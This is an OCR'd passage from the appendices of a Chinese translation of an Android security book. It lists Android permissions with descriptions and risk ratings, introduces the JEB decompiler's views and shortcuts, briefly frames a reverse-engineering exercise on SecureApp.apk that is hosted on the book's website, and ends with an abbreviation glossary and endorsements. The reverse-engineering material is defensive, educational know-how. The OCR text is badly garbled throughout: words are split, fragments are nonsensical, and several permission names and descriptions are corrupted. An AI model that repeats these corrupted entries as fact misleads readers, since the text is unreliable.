CHANGE. NETWORK, STATE 允许 应 用 程序 改变 网 络 连接 状态 1 
允许 应 用 程序 启动 Wi-Fi 多 播 模式 (Multicast 
CHANGE_WIFI_MULTICAST_STATE 1 
Mode) 
CHANGE_WIFI_STATE 允许 应 用 程序 更 改 Wi- Fi 连接 状态 1 
允许 应 用 程序 清除 设备 上 所 有 安装 的 应 用 程序 
CLEAR, APP. CACHE 9 2 
的 缓存 
CLEAR. APP. USER. DATA 允许 应 用 程序 清除 应 用 软件 的 用 户 数据 2 
允许 启用 /禁用 来 自 无 线 模块 的 位 置 更 新 通知 
CONTROL_LOCATION_UPDATES 2 
( Notification) 
DELETE CACHE FILES 允许 应 用 程序 删除 缓存 文件 2 
DELETE_PACKAGES 允许 应 用 程序 印 载 软件 包 3 
DEVICE_POWER 允许 访问 底层 电源 管理 2 
DIAGNOSTIC 允许 应 用 程序 读 写 诊断 资源 1 
DISABLE_KEYGUARD 允许 应 用 程序 禁用 键盘 锁 ( keyguard) 2 
允许 应 用 程序 从 系统 服务 (Service). 提取 状态 
DUMP 2 
转 储 (dump) 信息 
EXPAND_STATUS_BAR 允许 应 用 程序 展开 或 收缩 状态 栏 1 
设备 厂商 提供 的 设备 测试 程序 ， 只 有 超级 用 户 
FACTORY_TEST M 3 
(root) 才能 运行 
FLASHLIGHT 允许 访问 闪光 灯 1 
TORCE BACK 允许 应 用 程序 强制 系统 执行 BACK 操作 ， 无 论 i 
z 其 Activity 是 否 在 顶层 
Gis 允许 应 用 程序 获取 账户 服务 (Accounts Service) 4 
一 维护 的 账户 列表 
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(E) 
权限 名 称 说 明 介 绍 风险 等 级 
允许 应 用 程序 获取 系统 中 任意 程序 占用 的 存储 
GET. PACKAGE SIZE o 1 
空间 大 小 
GET_TASKS 允许 应 用 程序 获取 当前 或 近期 运行 任务 的 信息 2 
允许 全 局 搜索 系统 访问 Content Provider 提供 的 
GLOBAL, SEARCH . 2 
数据 
HARDWARE, TEST 允许 访问 外 围 硬件 设备 ， 即 外 设 2 
允许 应 用 程序 将 用 户 事件 ( 按键、 触摸 、 轨 迹 
INJECT. EVENTS ER) 注入 到 事件 流 ， 然 后 将 这 些 用 户 事件 交 付 给 3 
IER HY TA E 
AUR PROVIDER 允许 应 用 程序 向 位 置 管理 器 (Location Manager) > 
D A 安装 自 定义 的 位 置 提供 者 (Location Provider) 
INSTALL PACKAGES 允许 应 用 程序 安装 其 他 应 用 软件 3 
允许 应 用 程序 打开 部 分 系统 用 户 界 面 使 用 的 
INTERNAL, SYSTEM, WINDOW ma 3 
Ar 
INTERNET 人 允许 应 用 程序 开启 网 络 套 接 字 (Socket) 3 
允许 应 用 程序 调用 killBackgroundProcesses( ) PR 
KILL_BACKGROUND_PROCESSES z 2 
数 杀 死 后 台 进 程 
ER 允许 应 用 程序 管理 账户 管理 器 ( AccountManager ) à 
E 维护 的 账户 列表 
允许 应 用 程序 管理 (创建 ， 销 毁 ，Z 序 ) 窗口 
MANAGE APP TOKENS 管理 器 ( Window Manager) 内 的 应 用 程序 标号 3 
( Token) 
MASTER, CLEAR 3 
MODIFY. AUDIO. SETTINGS 允许 应 用 程序 更 改 系统 全 局 音频 设置 1 
MODIFY. PHONE, STATE 允许 更 改 电话 状态 ， 如 开机 ，mmi 等 p 
MOUNT_FORMAT_FILESYSTEMS 允许 格式 化 可 移 除 存储 器 的 文件 系统 2 
MOUNT. UNMOUNT. FILESYSTEMS fo VETESU EIER RT E RIT Ht E) XCTT ZR i 2 
NFC 允许 应 用 程序 使 用 NFC 进行 IO 操作 3 
该 权限 在 级 别 9 的 Android API 中 停止 使 用 ， 并 
Te A 且 这 一 功能 将 在 以 后 的 Android API 中 删除 ， 建 议 
F 户 不 要 使 用 。 人 允许 应 用 程序 保持 其 Activity 持久 
PROCESS_OUTGOING_CALLS 允许 应 用 程序 监控 、 更 改 或 放弃 电话 呼叫 3 
READ_CALENDAR 允许 应 用 程序 读 取 用 户 日 程 数 据 3 




































































































































































































































































































































































附 录 161 
( 续 ) 
权限 名 称 说 明 介 绍 风险 等 级 
READ_CALL LOG 允许 应 用 程序 读 取 用 户 呼叫 记录 3 
READ_CONTACTS 允许 应 用 程序 读 取 用 户 联系 人 资料 3 
READ. EXTERNAL STORAGE 允许 应 用 程序 从 外 部 存储 设备 中 读 取 数据 3 
READ_FRAME_BUFFER 允许 应 用 程序 截屏 ， 通 常用 于 访问 帧 缓存 数据 3 
允许 应 用 程序 读 取 (但 不 更 改 ) 用 户 浏览 器 历 
READ_HISTORY_BOOKMARKS mE. 3 
史记 录 和 书签 
— A 该 权限 在 级 别 16 的 Android API 中 停止 使 用 ， 
一 ^ 使 用 这 一 权限 的 API 已 被 删除 
READ_LOGS 允许 应 用 程序 读 取 底 层 系统 日 志文 件 3 
READ. PHONE, STATE 允许 只 读 访 问 电话 状态 3 
READ_PROFILE 允许 应 用 程序 读 取 用 户 个 人 资料 数据 3 
READ_SMS 允许 应 用 程序 读 取 SMS 短信 息 3 
READ. SOCIAL STREAM 允许 应 用 程序 从 用 户 社交 平台 上 读 取 数据 3 
READ_SYNC_SETTINGS 允许 应 用 程序 读 取 同 步 设置 2 
READ_SYNC_STATS 允许 应 用 程序 读 取 同步 状态 2 
READ_USER_DICTIONARY 允许 应 用 程序 读 取 用 户 词 } 2 
REBOOT 用 于 请 求 设备 重启 2 
允许 应 用 程序 接收 系统 启动 完成 时 广播 的 
RECEIVE_BOOT_COMPLETED EORUM 2 
ACTION. BOOT. COMPLETED 事件 动作 
iE 允许 应 用 程序 监听 MMS 信息 到 来 ， 记 录 或 对 其 
z 进行 处 理 
允许 应 用 程序 监听 SMS 短 消 息 到 来 ， 记 录 或 对 
RECEIVE. SMS ps 3 
其 进行 处 理 
RECEIVE, WAP. PUSH 允许 应 用 程序 监听 WAP 推送 (push) 信息 3 
RECORD_AUDIO 允许 应 用 程序 录音 3 
允许 应 用 程序 改变 任务 的 先后 顺序 ， 也 就 是 任 
REORDER_TASKS i 2 
4 ZJF (Z-order) 
— 该 权限 在 级 别 8 的 Android API 中 停止 使 用 ， 系 
E i 统 不 再 支持 restartPackage( ) 函数 功能 
SEND_SMS 允许 应 用 程序 发 送 SMS 短信 息 3 
允许 应 用 查看 并 控制 Activity 在 系统 中 的 运行 
SET_ACTIVITY_WATCHER 2 





SET_ALARM 











允许 应 用 程序 广播 一 个 Intent, BEH eh 
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(E) 
权限 名 称 说 明 介 绍 风险 等 级 
允许 应 用 程序 转 入 后 台 运 行 时 ， 是 否 立 即 终止 
SET_ALWAYS_FINISH m 1 
( Finish ) 当前 Activity 
SET_ANIMATION_SCALE 修改 全 局 动画 缩放 系数 1 
SET_DEBUG_APP 将 应 用 程序 设置 为 调试 模式 1 
允许 应 用 程序 调用 底层 函数 设置 屏幕 方向 (SE 
SET_ORIENTATION ee 1 
际 就 是 旋转 屏幕 ) 
SET. POINTER, SPEED 允许 应 用 程序 调用 底层 函数 设置 光标 速度 1 
该 权限 在 级 别 7 的 Android API 中 停止 使 用 ， 详 
SET PREFERRED APPLICATIONS 1 
见 addPackageToPreferred ( ) 函数 说 明 
允许 应 用 程序 设置 系统 能 够 运行 的 应 用 程序 进 
SET_PROCESS_LIMIT gea 1 
程 数量 的 最 大 值 
SET_TIME 允许 应 用 程序 设置 系统 时 间 1 
SET_TIME_ZONE 允许 应 用 程序 设置 系统 时 区 1 
SET_WALLPAPER 允许 应 用 程序 设置 壁纸 1 
SET_WALLPAPER_HINTS 允许 应 用 程序 设置 壁纸 提示 1 
SIGNAL_PERSISTENT_PROCESSES 允许 应 用 程序 给 所 有 稳定 进程 发 送信 号 的 请 求 1 
允许 应 用 程序 打开 ， 关 闭 或 禁用 状态 栏 及 其 
STATUS, BAR H 1 
网 标 
允许 应 用 程序 访问 自己 订阅 的 内 容 提供 器 
SUBSCRIBED_FEEDS_READ 1 
( Content Provider) 
SUBSCRIBED_FEEDS_WRITE 1 
允许 应 用 程序 使 用 TYPE. SYSTEM, ALERT 类 型 
SYSTEM_ALERT_WINDOW 参数 打开 窗口， 并 将 窗口 显示 在 所 有 其 他 应 用 程 1 
序 窗口 的 上 面 
UPDATE_DEVICE_STATS 允许 应 用 更 新 设备 资料 信息 1 
WR CHEDERTPATS 允许 应 用 程序 向 账户 管理 器 ( Account Manager ) i 
p 请 求 授权 标记 
USE_SIP 允许 应 用 程序 使 用 SIP 服务 1 
VIBRATE 允许 访问 振动 器 1 
允许 使 用 电源 管理 器 ( PowerManager) 的 
WAKE_LOCK S 1 
WakeLocks， 阻 止 进程 休眠 或 屏幕 变 暗 
WRITE, APN. SETTINGS 允许 应 用 程序 修改 APN 设置 1 
WRITE_CALENDAR 允许 应 用 程序 修改 (但 不 读 取 ) 用 户 日 程 数 据 2 
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(5) 
权限 名 称 说 明 介 绍 风险 等 级 
允许 应 用 程序 修改 存储 于 手机 上 的 系统 电话 
WRITE_CALL_LOG jé 2 
允许 应 用 程序 修改 (但 不 读 取 ) 用 户 联系 人 
WRITE_CONTACTS 3 
WRITE EXTERNAL STORAGE 允许 应 用 程序 将 数据 写 入 到 外 部 存储 设备 3 
WRITE_GSERVICES 允许 应 用 程序 修改 Google 服务 地 图 2 
允许 应 用 程序 修改 (但 不 读 取 ) 用 户 浏览 器 历 
WRITE_HISTORY_BOOKMARKS 2 
史记 录 和 书签 
允许 应 用 程序 修改 (但 不 读 取 ) 用 户 个 人 资料 
WRITE_PROFILE 2 
数据 
WRITE, SECURE, SETTINGS 允许 应 用 程序 读 / 写 系统 安全 设置 2 
WRITE_SETTINGS 允许 应 用 程序 读 / 写 系统 设置 2 
WRITE_SMS 允许 应 用 程序 编辑 SMS 短信 息 2 
允许 应 用 程序 在 用 户 社交 平台 上 编辑 (但 不 读 
WRITE. SOCIAL STREAM À 2 
取 ) 发 布 数据 
WRITE_SYNC_SETTINGS 允许 应 用 程序 修改 同步 设置 1 
WRITE_USER_DICTIONARY 允许 应 用 程序 对 用 户 词典 进行 写 和 人 1 





















































附录 B JEB 反 汇 编 器 和 反 编译 器 简介 


本 书 在 第 6 章 和 第 7 章 已 经 介绍 了 ， 使 用 各 种 开源 工具 对 Android 应 用 程序 进 
行 反 编译 和 逆向 工程 的 方法 。 因 此 ， 本 附录 将 简要 介绍 JEB 分 析 工 具 和 使 用 方法 。 
JEB 作为 Android 应 用 程序 的 反 汇 编 器 和 反 编 译 器 ， 主 要 用 来 处 理 APK 或 DEX X 
件 ， 并 将 处 理 后 的 分 析 结 果 保 存 到 JDB 文件 中 。 

如 图 B. 1 所 示 ，JEB 的 工作 区 界面 主要 由 四 个 区 域 构成 : 

1) 顶部 的 菜单 栏 和 工具 条 。 

2) 底部 的 控制 台 窗 口 和 状态 条 。 

3) 类 层次 结构 浏览 窗口 。 

4) 可 以 包含 多 个 重要 子 视 图 的 标签 栏 窗口 。 


B.1 视图 


fr JEB 的 工作 区 中 ， 用 于 表示 待 分 析 文 件 部 分 的 视图 包含 在 标签 栏 窗口 ( 即 
图 B. 1 中 标号 为 4 的 区 域 ) 内 ， 该 视图 可 以 通过 菜单 栏 的 “Window” 菜单 选项 开 
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K| B. 1 JEB 主 窗口 界面 


启 和 关闭 。 下 面 列 出 了 儿 种 常见 的 视图 : 

e 汇编 视图 (AssemblyView) 。 该 视图 包含 DEX 文件 中 所 有 类 的 反 汇 编 代码 ， 
用 户 可 以 在 该 视图 内 进行 各 种 交互 操作 (如 查找 等 )。 为 了 提高 汇编 视图 的 简洁 
性 ， 便 于 用 户 能 够 清晰 地 查看 视图 内 容 ， 该 视图 还 可 以 仅 显 示 smali 代码 或 简化 的 
Dalvik 汇编 代码 。 

e 反 编 译 视 图 (DecompiledView) 。 该 视图 包含 由 类 的 字 节 人 码 经 反 编 译 生成 的 
Java 源 代 码 。 使 用 “Tab” 键 可 以 在 汇编 视图 和 反 编 译 视 图 之 间 切 换 ， 并 保持 光标 
始终 停留 在 同一 个 类 上 。 

e ^r ERE ( StringsView) o 该 视图 包含 出 现在 DEX 文件 中 的 所 有 字符 串 的 
列表 。 双 击 其 中 任意 一 个 字符 串 ， 可 以 直接 切换 到 汇编 视图 ， 并 将 光标 定位 在 汇编 
视图 re 出 现 的 位 置 。 

量 视 图 (ConstantsView) 。 该 视图 包含 出 现在 DEX 文件 中 所 有 数字 常量 的 
js. midi 一 个 常量 ， 可 以 直接 切换 到 汇编 视图 ， 并 将 光标 定位 在 汇编 视 
图 中 该 常量 首次 被 使 用 出 现 的 位 置 。 

© Manifest 视图 (Manifest View) 。 该 视图 显示 应 用 程序 解压 缩 产 生 的 Manifest 
文件 内 容 。 

e 资源 视图 (ResourcesView) 。 该 树 形 视图 使 用 户 能 够 浏览 应 用 程序 解压 缩 产 
生 的 各 种 资源 文件 。 

o Assets 视图 ( AssetsView)。 该 视图 与 资源 视图 特别 相似 ， 同 样 用 于 供用 户 浏 
览 Android 应 用 程序 中 assets 文件 夹 内 的 资源 文件 。 

e 证 书 视图 ( CertificatesView)。 该 视图 以 可 读 的 形式 显示 用 于 APK 安装 包 签 
名 的 数字 证 书 。 
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e 外 部 类 /函数 /字段 视图 (External Classes/Methods/Fields View), 3x JL fb dll 
图 用 于 将 DEX 文件 中 引用 和 使 用 的 各 种 外 部 类 、 函 数 和 字段 以 列表 的 形式 显示 
出 来 。 

e 注释 视图 (Notes View) 。 该 视图 用 于 存放 代码 分 析 时 用 户 标注 的 注释 内 容 。 

类 层次 结构 视图 (class hierarchy view， 即 图 B. 1 中 标号 为 3 的 区 域 ) ， 包 含 了 
出 现在 DEX 文件 内 所 有 类 的 列表 。 这 些 类 是 以 包 的 形式 进行 组 织 显 示 的 。 

点 击 或 双击 其 中 任意 一 个 类 名 ， 即 可 打开 汇编 视图 ， 并 自动 将 光标 停留 在 用 户 
点 击 的 类 上 。 

如 果 想 要 更 加 清晰 明了 地 查看 显示 在 类 层次 结构 视图 中 各 个 类 的 信息 ， 用 户 可 
以 在 该 层次 树 的 底部 标记 相应 的 复 选 框 ， 从 而 对 内 部 类 进行 暂时 地 标注 。 


B.2 代码 视图 


在 分 析 应 用 程序 时 ， 汇 编 和 反 编 译 代码 视图 是 两 种 非常 重要 的 视图 。 这 两 种 代 
人 码 视图 具有 良好 的 用 户 交 互 性 ， 能 够 很 好 地 配合 用 户 对 应 用 程序 进行 分 析 。 

这 两 种 视图 向 用 户 提供 了 丰富 的 可 交互 选项 ， 包 括 : 类 、 字 段 、 函 数 、 机 器 码 
(opcode) 、 指 令 ， 以 及 注释 等 代码 内 容 交 互 选项 。 

当 用 户 焦点 落 在 这 两 种 视图 上 时 ， 用 户 可 进行 的 各 种 交互 操作 如 下 : 

* Rename items ( 重 命 名 选项 ， 快 捷 键 : N): 用 于 重合 名 类 、 字 上段 和 也 数 的 
名 字 ， 修 改 的 结果 同时 也 将 体现 在 其 他 的 视图 中 。 反 编译 视图 中 的 变量 和 参数 也 
可 以 被 重 命名 。 不 过 ， 对 于 那些 没有 在 DEX 文件 中 定义 的 外 部 代码 项 不 能 被 重 
新 命名 。 

* Insert comments (搬入 注释 ， 人 快捷 键 : C): 可 以 对 指定 的 类 、 字 7 段 和 函数 标 记 
注释 内 容 ， 以 及 标注 指定 的 函数 说 明 。 这 些 注释 既 可 以 是 文本 ， 也 可 以 是 音频 ， 或 者 
两 者 兼用 。 音 频 注 释 被 标记 为 “!”， 后 面 可 选 是 否 跟 随 着 文本 注释 。 

* Examine cross references (查看 交 义 引用 ， 快 捷 键 : X): 大 多 数 的 可 交互 项 ， 
可 以 使 用 交叉 引用 来 查看 它们 的 使 用 位 置 。 这 些 交 叉 引 用 项 会 以 它们 在 代码 中 出 现 
的 顺序 的 形式 列 出 。 用 户 可 以 双击 任意 一 个 交叉 引用 项 ， 跳 转 到 该 交叉 引用 所 在 的 
位 置 。 

€ Navigate (导航 ， 快 捷 键 : Enter): 用 户 可 以 “追踪 ”指定 的 代码 项 。 也 就 
是 说 ， 用 户 可 以 使 用 导航 功能 跳 转 指定 代码 定义 /声明 的 位 置 。 例如, “追踪 ”一 
个 被 调用 的 函数 foo( ) 的 意思 ， 就 是 跳 转 到 foo( ) 函数 定义 /声明 的 位 置 。 

在 Assembly 视图 中 ， 用 户 能 够 通过 按 “Tab” 键 ， 对 一 个 类 进行 反 编译 。 随 
后 ， 当 前 视图 将 切换 到 目标 类 的 反 编译 视图 ， 并 且 将 光标 定位 在 与 源 字 节 码 指 令 
最 匹配 的 高 级 Java 语句 上 。 相 反 ， 当 光标 位 于 高 级 Java 语句 时 ， 将 视图 切换 回 
Assembly WE, JEB 也 会 试图 把 光标 定位 在 同 原 Java TH] fc VG BORS IC AR ^ Ti fd 
A b, 
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B.3 快捷 键 


K B. 1 所 示 的 快捷 键 ， 主 要 用 在 代码 视图 内 。 为 了 提高 工作 效率 ， 本 书 强 烈 
推荐 用 户 能 够 熟练 地 运用 这 些 快 捷 键 。 经 验 丰 富 的 逆向 工程 师 可 能 会 比较 熟悉 这 些 
快捷 键 ， 因 为 对 于 标准 的 反 汇 编 工具 来 说 ， 它 们 使 用 的 快捷 键 基本 都 是 相通 的 。 

表 B.1 代码 视图 内 可 以 使 用 的 快捷 键 

























































































qe pE 键 说 W 
Tab 对 选 定 的 类 进行 反 编译 (在 汇编 视图 中 )/ 切 换 回 汇编 视图 (在 反 编译 视图 中 ) 
N 对 选 定 的 内 部 项 进行 重 命名 ( 如 类 、 字 段 、 函 数 和 变量 ) 
C (或 Slash) 搬入 注释 
x 查看 一 条 可 交互 语句 的 所 有 交叉 引用 项 (用户 可 以 双击 这 些 交叉 引用 项 ， 从 而 
“追踪 ”查看 代码 中 引用 这 条 可 交互 语句 的 位 置 ) 
Enter 追踪 一 条 可 交互 语句 项 
Escape 返回 到 follow- history 中 记录 的 上 一 个 光标 位 置 
Ctrl- Enter 前 进 到 follow- history 中 记录 的 下 一 个 光标 位 置 
F5 刷新 /同步 代码 视图 内 容 








B.4 参数 设置 选项 


编辑 (Edit)/ 选 项 (Options) 菜单 ， 用 于 供用 户 定制 JEB 工具 的 外 观 和 风格 。 
这 些 参 数 设置 选项 分 为 多 个 类 别 (汇编 视图 通 
用 参数 设置 选项 /汇编 视图 专用 参数 设置 选项 ， 
代码 视图 专用 参数 设置 选项 ， 等 等 ),， 其 中 大 s 


































|V| Compress database ite! 























M » EN 要 ms (slower load) 
多 数 的 参数 设置 选项 都 比较 好 理解 ， 如 图 B.2 n | 
所 示 。 T 
“show debug directives/line numbers (显示 ,ot traen 
调试 指令 / 行 号 )” 选 项 ， 用 于 显示 汇编 代码 中 | showads 























特有 的 元 数据 。 用 户 需要 注意 的 是 ， 这 种 元 数 。 eo shon dug secies 

据 很 容易 被 伪造 ， 因 此 不 要 相信 这 些 元 数据 。 "se evesbos enmen 
“keep smali compatibility" 选项， 用 于 生成 ” 7 | 器 Kesp Smali compatibility 

能 够 “兼容 ”smali 的 汇编 代码 。 “兼容 ”在 这 3 | reep the wer tope tte) 

里 的 意思 是 ， 比 如 先 调 用 带 有 参数 的 指令 , 然 人 | eret und 

后 保留 完整 的 函数 名 、 类 名 ， 以 及 具体 的 分 支 | 

iB] (switch) 结构 等 。 禁 用 该 “smali compati- 


bility” 选项 , 可 极 大 地 提高 汇编 代码 的 可 读 性 。 到 B.2 JEB 工具 参数 设置 选项 




































































附 录 167 








"Style (风格 ) ”选项 ,包含 一 些 可 供用 户 选 择 的 字体 (该 选项 设置 在 所 有 视 
图 中 都 有 效 ) 和 颜色 样式 。 

通常 ， 默 认 的 字体 被 设置 为 固定 的 标准 字体 ， 一 般 是 宋体 。 不 过 不 同系 统 可 能 
RUM 最 新 版 本 的 宋体 字库 包含 大 量 的 Unicode 字符 ， 而 有 的 用 户 的 宋体 字库 

可 能 没有 CIKO (中 日 韩 ) 字符 ， 这 种 字符 在 处 理 亚 洲 语言 环境 的 应 用 程序 时 ， 

E m2 DE i M 
的 仿宋 字体 ， 以 及 Ubuntu 系统 上 的 Sans 字体 。 这 些 字 体 可 以 很 好 地 支持 BMPS 
(Basic Multilingual Plane ， 基 本 多 文 种 平面 ) ， 包 括 CJK、 俄 语 、 泰 语 和 阿拉 伯 语 。 

"Style manager. (风格 管理 器 ) ”按钮 ， 可 以 使 用 户 自 定 义 各 种 交互 项 的 颜色 和 
外 观 ， 该 设置 对 代码 视图 和 XML 视图 有 效 ， 用 于 泻 染 Manifest 和 其 他 XML 资源 的 
显示 颜色 。 交 互 项 的 Foreground colors (前 景色 ) 和 background colors (FRE) 设 
Er, UK font attributes. (字体 属性 ) 设置 ， 都 可 在 风格 管理 器 内 由 用 户 定制 ， 如 
图 B. 3 所 示 。 
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图 B.3 JEB 工具 的 代码 风格 管理 器 





附录 C 破解 应 用 程序 SecureApp. apk 


本 附录 将 详细 介绍 恶意 用 户 如 何 使 用 逆向 工程 修改 特定 应 用 程序 的 行为 。 在 第 





CJK， 中 日 韩 统一 表意 文字 (CJK Unified Ideographs) ， 目 的 是 要 把 分 别 来 自 中 文 、 日 文 、 韩 文 、 越 文 
中 ， 本 质 、 意 义 相 同 、 形 状 一 样 或 稍 异 的 表意 文字 ( 主要 为 汉字 ， 但 也 有 仿 汉 字 ， 如 日 本 国字 、 昔 























国 独 有 汉字 、 越 南 的 喃 字 ) 于 ISO 10646 及 Unicode 标准 内 赋予 相同 编码 。CJK 是 中 文 ( Chinese) , 
H3 (Japanese), 、 韩 文 (Korean) 三 国文 字 的 缩写 。 顾 名 思 义 ， 它 能 够 支持 这 三 种 文字 。 一 一 译 





© BMP (Basic Multilingual Plane， 基 本 多 文 种 平面 ) ， 或 称 第 零 平 面 (Plane 0) ， 是 Unicode 中 的 一 个 编 
区 段 。 编 码 从 U +0000 至 U+FFFF。 一 一 译 者 注 
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7 章 中 ， 已 经 


借助 应 用 程序 SecureApp. apk， 展 示 了 亚 意 用 户 使 用 闭 向 工程 修改 应 


用 程序 4 了 为 的 一 种 方式 。 因 此 ， 本 教程 将 演示 一 些 其 他 的 方式 ， 恶 意 用 户 就 是 使 用 
这 些 方式 修改 应 用 程序 的 行为 ， 以 达到 添加 或 删除 应 用 程序 功能 的 目的 。 
由 于 本 练习 属于 动手 实践 类 的 操作 。 因此 ， 读者 可 以 在 本 书 网 站 (www. androi- 
dinsecury. com) 的 相应 章节 中 获得 该 附录 的 内 容 。 其 中 ， 在 练习 过 程 中 用 到 的 所 有 
文件 ， 都 可 以 在 该 网 站 的 资源 部 分 找到 。 读 者 需要 使 用 下 述 账号 和 密码 ， 访 问 并 获 









































































































































取 该 网 站 资源 部 分 提供 的 文件 。 
用 户 名 : android 
密码 : 1439896461 
附录 D 英文 缩 略 语 
ACL Access Control Lists 网 络 控制 列表 
ADAAPI Android Device Administration API Android 设备 管理 API 
ADB Android Debug Bridge Android 调试 桥接 器 
ADT Android Development Tools Android 开发 工具 
AOSP Android Open Source Project Android 开源 项 目 
API Application Programming Interface 应 用 程序 编程 接口 
APP Application 应 用 程序 
APK Android Package Android 安装 包 
ATRG Advanced Threat Research Group 高 级 威胁 研究 小 组 
AUP Acceptable Use Policy 可 接受 使 用 策略 
AVD Android Virtual Device Android 模拟 器 
AWT Abstract Window Toolkit 抽象 窗口 工具 包 
BMP Basic Multilingual Plane 基本 多 文 种 平面 
BSD Berkeley Software Distribution 伯克利 软件 套件 
BYOD Bring Your Own Device 自 带 设备 
C/S Client/Server 客户 端 / 服 务 器 
C&C Command and Control 命令 与 控制 
CBSE Critical Business Security External team 思科 外 部 关键 业务 安全 组 
CCHS Cisco' s Cloud Hosted Services 思科 云 托管 服务 
CDMA Code Division Multiple Access 码 分 多 址 接 人 
CIO Chief Information Officer 首席 信息 官 
CJK CJK Unified Ideographs "p HR REE 
CnC Command and Control Center 命令 与 控制 中 心 
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( 续 ) 
CSRF Cross Site Request Forgery 跨 站 点 伪造 请 求 
CVE Common Vulnerabilities and Exposures 常见 漏洞 和 暴露 
DB Database 数据 库 
DDMS Dalvik Debug Monitoring Service Dalvik 虚拟 机 调试 监控 服务 
DEX Dalvik Executable Format Dalvik 可 执行 格式 
DoD Department of Defense of the United States 美国 国防 音 
EAS Exchange ActiveSync 主动 同步 协议 
ext2 Second extended file system 第 二 代 扩 展 文 件 系 统 
ext3 Third extended file system 第 三 代 扩 展 文 件 系 统 
ext4 Fourth extended file system 第 四 代 扩 展 文 件 系 统 
GID Group ID 群 组 ID 
GPL General Public License 通用 公共 许可 证 
GPS Global Positioning System 全 球 定位 系统 
GSM Global System for Mobile communication 全 球 移动 通信 系统 
HDMI High Definition Multimedia Interface 高 清晰 度 多 媒体 接口 
HTML Hypertext Markup Language 超 文本 标记 语言 
HTTP Hyper text Transport Protocol 超 文本 传输 协议 
HTTPS Hypertext Transfer Protocol over Secure Socket Layer | 位 于 安全 套 接 字 层 之 上 的 超 文本 传输 协议 
HSTS Http Strict Transport Security 强制 安全 传输 技术 
IDE Integrated Development Environment 集成 开发 环境 
IEC International Electrotechnical Commission 国际 电工 委员 会 
IMEI International Mobile Equipment Identity 国际 移动 设备 识别 码 
IMSI International Mobile Subscriber Identity 国际 移动 用 户 识别 码 
InfoSec Information Security Team 思科 信息 安全 组 
INI Information Networking Institute 言 息 网 络 研究 所 
IPC Internet Process Connection 进程 间 通 信 
IR Incident Response 应 急 响应 
IRC Internet Relay Chat 互联 网 在 线 聊 天 
ISO International Organization for Standards 国际 标准 化 组 织 
IT Information Technology 信息 技术 
Jar Java Archive Java 架构 
JNI Java Native Interface Java 本 地 接口 
JVM Java Virtual Machine Java 虚拟 机 
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MAC Mandatory Access Control 强制 访问 控制 
MDM Mobile Device Management 移动 设备 管理 
MITM Man In The Middle 中 间 人 
MMS Multimedia Messaging Service 多 媒体 短信 服务 
NFC Near Field Communication 近 场 通信 
NIST National Institute of Standards and Technology 美国 国家 标准 与 技术 研究 院 
NSA National Security Agency 美国 国家 安全 局 
NSF National Science Foundation 国家 科学 基金 会 
NVD National Vulnerability Database 国家 漏洞 数据 库 
OHA Open Handset Alliance 开放 手机 联盟 
OS Operating System 操作 系统 
OSSTMM Open Source Security Testing Methodology Manual | 开源 安全 测试 方法 手册 
OWASP Open Web Application Security Project 开放 Web 应 用 程序 安全 项 目 
PCI DSS Payment Card Industry Data Security Standard 支付 卡 行业 数据 安全 标准 
PDA Portable Digital Assistant 个 人 数字 助理 
Pen Testing Penetration Testing 渗透 测试 
PIN Personal Identification Number 个 人 识别 密码 
POC Proof of Concept 概念 验证 
QR Quick Response 快速 反应 
RAM Random Access Memory 随机 存储 器 
RFID Radio Frequency Identification 射频 识别 
ROM Read- Only Memory 只 读 存 储 器 
RPC Remote Procedure Calls 远程 过 程 调 
SD Secure Digital Memory Card 安全 数字 记忆 卡 
SDLC Software Development Life Cycle 软件 开发 周期 
SDK Software Development Kit 软件 开发 工具 包 
SE Secure Element 安全 单元 
SHA Secure Hash Algorithm 安全 散 列 算法 
SIM Subscriber Identity Module 用 户 识别 模块 
SMS Short Messaging Service 短信 服务 
SQLi SQL Inject SQL 注入 
SSCO Security Services and Cloud Operations team 思科 安全 服务 与 云 运 维 组 
SSL Secure Sockets Layer 安全 套 接 字 层 
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Social Security Number 


社会 保险 号 





Server Side Processing 


服务 器 端 处 理 





Transaction Authentication Number 





交易 授权 验证 码 





Transport Layer Security 


安全 传输 层 协 议 





User Datagram Protocol 


用 户 数 据 报 协议 





User Interface 
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一 一 





User ID 








用 户 ID 





Uniform Resource Identifier 


统一 资源 标识 





Uniform Resource Locator 





统一 资源 定位 符 





Virtual File System 


虚拟 文件 系统 





Virtual Machine 


虚拟 机 





Virtual Private Network 


虚拟 专用 网 





Wireless Application Environment 


无 线 应 用 环境 





Wireless Application Protocol 


无 线 应 用 协议 





Wireless Datagram Protocol 


无 线 数据 报 协议 





Wireless Fidelity 


无 线 保 真 技术 









































Wireless Markup Language 无 线 标记 语言 
Wireless Session Protocol 无 线 会 话 协议 
Wireless Telephony Application 无 线 电 话 应 
Wireless Transport Layer Security 无 线 传输 层 安 全 
Wireless Transaction Protocol 无 线 传输 协议 
World Wide Web 万 维 网 /互联 网 





Extensive Markup Language 


可 扩展 标记 语言 





Cross Site Request Forgery 


跨 站 点 伪造 请 求 








Cross Site Scripting 





跨 站 点 脚本 
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本 书 部 分 推荐 语 


这 是 一 本 从 事 移 动 设备 与 应 用 软件 领域 的 
企业 安全 主管 ， 以 及 安全 架构 师 与 咨询 师 必 备 
的 专业 书 。 

— EPI - 梅 隆 大 学 信息 网 络 研究 所 主任 兼 CyLab 分 

校 教育 主任 Dena Haritos Tsamitis 

如 果 你 在 Android 数 据 与 应 用 程序 安全 领 

ALTRE LONE 那么 本 书 可 以 在 
架构 方面 ， 为 你 提供 有 价值 县 深入 的 见 
E 并 且 在 主流 移动 设备 系统 平台 的 安全 防护 

， 为 你 提供 非常 实用 的 指导 。 

一 一 Sophos 软 件 公 司 首席 技术 官 兼 高 级 副 总 裁 
Gerhard Eschelbeck 

本 书 内 容 详实 ， 涵 盖 了 从 Android 系 统 平 
台 到 应 用 程序 各 个 方面 的 安全 问题 ， 为 所 有 
对 移动 设备 恶意 软件 分 析 感 兴趣 的 人 士 HE 
供 了 丰富 的 基础 知识 。 同 时 ， 对 于 那些 想 了 
解 Android 应 用 程序 内 在 本 质 的 人 来 说 ， 本 
书 也 为 他 们 提供 了 一 个 非常 好 的 入 手 点 和 出 发 


一 一 JEB 反 编译 软件 创始 人 Nicholas Falliere 


Dubey 和 Misra 提 供 了 一 套 独 特 且 完整 的 
方法 ， 解决 了 移动 设备 系统 安全 方面 关键 但 易 
被 误解 的 专题 ， 弥 补 了 软件 安全 文献 中 又 一 项 
重要 的 空白 。 他们 掌握 了 很 多 基本 的 安全 威胁 
和 对 策 ， 这 些 威胁 和 对 策 都 是 非常 有 必要 去 理 
